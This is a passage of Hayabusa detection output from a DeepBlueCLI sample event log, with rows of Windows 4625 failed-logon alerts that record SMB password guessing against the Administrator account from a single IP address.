01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ulbcy5PWLYUm5Sy0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L8rkZ7iBMam5o8VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n39Zox0PFeNirzyT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3u3YUCKxEo5pnKJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wen3pHM88kSRkHNf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGDHJ4KMm2zEMV0b : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKZAB1nfXPYSLxsE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tYkOsX0XDpkdvp01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9y7HjOeGPcrdj1c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLwh8Lg3nvbm8Q2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoMkBcp8ouIgpX4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2UnrDiOAOec5DQGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UxJGLShj5EDKLSDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iWhaz8W0VLQdXKWN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 82YDxSIBnCAqdK4c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 795b7XqsxokIGJyM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1BmnyTsmP2XqMzf1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB3xsYe3RcPXhDib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxN9i8exdO2h4oa7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjcQaeuo4f8wFXhv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zCzr77BhliB4KKeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z558005RepKaO1zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HFzW25mJz4JLkv7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y7J8m97GQWt2cbSs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJrVwcpABBaZ8cyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VcDw3I4BaFLdIeCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: egEpV9aAuCFjwx2I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th0ZLWF4YeOaNnkK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ahrOLfdy6DCQ9SfO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xiooSdP5eib8PUE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6nQ2jp9IGYnGeyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejMtyR5QNdJFhw1W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e50kO0aVhfw5np5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 176XyLw6IhEI6NuD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXCzCSSFvpbWNJFd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhHRuZYlH8hekaKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGIUBFRMQ3OBbOA0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7CTT5g1w58eRRlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmVccmad66uOK9ox : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t1jlT6kEcs14dcNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBty5jOGkkZSZEyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Ci7YUsO5MtFkDSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 12JToliq9mmAuMTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lw9AgAvBGWoXBlim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ReGDyvRpGknAKqqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6mdUn8na4asRfpJP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7Wm5p4HnNCbkyh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MQZwerVd6E08X8Ou : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbDjtLKoX5Q77bn5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O7BNKHiPjzJKCaDk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHqBI8bzZn5VO9gq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xz2ZO3b3QSh6Rdqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEfdhrwbTfCpCXKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kc0LuQzAmQTIF1X3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WMZ70YmzpVp2h8mY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FFVr3Amq6mA3umiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnN15vqZcww8pqTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSuMRF1txQ9g2Mwi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tUuapChhs4CGO1cS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIMr0hjIkwD8AaEG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ww9HMQX0cqmolYQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJRRZ5e9lARVZDar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvUzVoSLqFPAXSWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SMMgPu1VJIjAWPDW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1JjIa4nOKDTLuAD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0J0GJIm1UUXHH9QJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVX3xIz0hrQFvPr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nv4tKFEmHjiXkVDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdHHJl9LBek9pIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MWofwwLjwiyBk39P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dvsHFZe7Z1uJ9Dkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aDdgwvb1zsZF79k : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQUb6CnMUtyrMNhF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP5OxHPsbLHnIUBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ysg903vYFhQHYvFJ : IP Address: 192.168.198.149 : AuthPackage: 